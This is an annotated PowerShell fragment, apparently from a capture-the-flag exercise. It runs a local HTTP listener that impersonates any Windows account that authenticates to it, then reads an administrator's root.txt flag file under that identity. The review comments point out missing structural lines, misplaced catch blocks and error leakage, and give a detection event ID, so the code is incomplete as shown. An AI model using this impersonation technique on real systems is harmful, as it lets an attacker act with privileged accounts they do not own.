# PowerShell fragment (not C#): a loopback HttpListener that requires Windows
# authentication, impersonates whoever authenticates, and runs a command under
# that identity. Several structural lines are missing from this copy: there is
# no visible `do {`, `try {`, catch-all opener or $listener.Start() call, so the
# fragment does not parse as shown.
# NOTE(review): nothing in the visible lines uses a System.Web type, and
# LoadWithPartialName is obsolete; `Add-Type -AssemblyName System.Web` is the
# supported form if the assembly is really needed.
[System.Reflection.Assembly]::LoadWithPartialName("System.Web")
$listener = New-Object System.Net.HttpListener
# Plain-HTTP prefix bound to the loopback name on port 7000.
$listener.Prefixes.Add("http://localhost:7000/")
# Every request must complete Negotiate/NTLM authentication, so the listener
# receives a Windows identity for each caller.
$listener.AuthenticationSchemes = [System.Net.AuthenticationSchemes]::IntegratedWindowsAuthentication
Write-Host "Listening..."
# GetContext() blocks until a request arrives.
# NOTE(review): it throws unless the listener was started; Start() is not
# visible in this fragment.
$context = $listener.GetContext()
# $requestUrl is assigned but never read in the visible lines.
$requestUrl = $context.Request.Url
$response = $context.Response
# Security-relevant: the thread takes on the identity of whichever account
# authenticated to the listener. The returned WindowsImpersonationContext is not
# captured, so Undo()/Dispose() is never called in the visible code and the
# object is emitted to the pipeline.
# NOTE(review): WindowsIdentity.Impersonate() is a .NET Framework API; confirm
# the target runtime.
# Detection: PowerShell script block logging (event ID 4104) records this
# HttpListener + Impersonate() combination.
$context.User.Identity.Impersonate()
# run any command as admin here
# `type` is the Get-Content alias. Its output is not assigned to $Content in the
# visible lines, so as shown it goes to the pipeline rather than the HTTP response.
type C:\users\administrator\desktop\root.txt
# Access denied while impersonating -> 401 with an empty body.
# (The matching `try {` is not visible in this fragment.)
} catch [System.UnauthorizedAccessException] {
$response.StatusCode = 401
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
# Target path not found -> 404 with an empty body.
} catch [System.Management.Automation.ItemNotFoundException] {
$response.StatusCode = 404
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
# NOTE(review): the next six lines presumably belonged to a separate catch-all
# block whose opening line is missing; as written they sit inside the 404
# handler and overwrite its status and body.
# They return the failing command name, exception message, script position text
# and error id to the HTTP client. That discloses script internals to the
# caller; prefer logging these server-side and sending a generic 500 body.
$Content = "$($_.InvocationInfo.MyCommand.Name) : $($_.Exception.Message)"
$Content += "$($_.InvocationInfo.PositionMessage)"
$Content += " + $($_.CategoryInfo.GetMessage())"
$Content += " + $($_.FullyQualifiedErrorId)"
$Content = [System.Text.Encoding]::UTF8.GetBytes($Content)
$response.StatusCode = 500
# Send whatever byte array $Content currently holds.
# NOTE(review): no $response.Close() is visible, so the response may never be
# completed for the client.
$response.ContentLength64 = $Content.Length
$response.OutputStream.Write($Content, 0, $Content.Length)
# Tail of a do/while loop (opening `do {` not visible) that repeats while the
# listener is still listening.
} while ($listener.IsListening)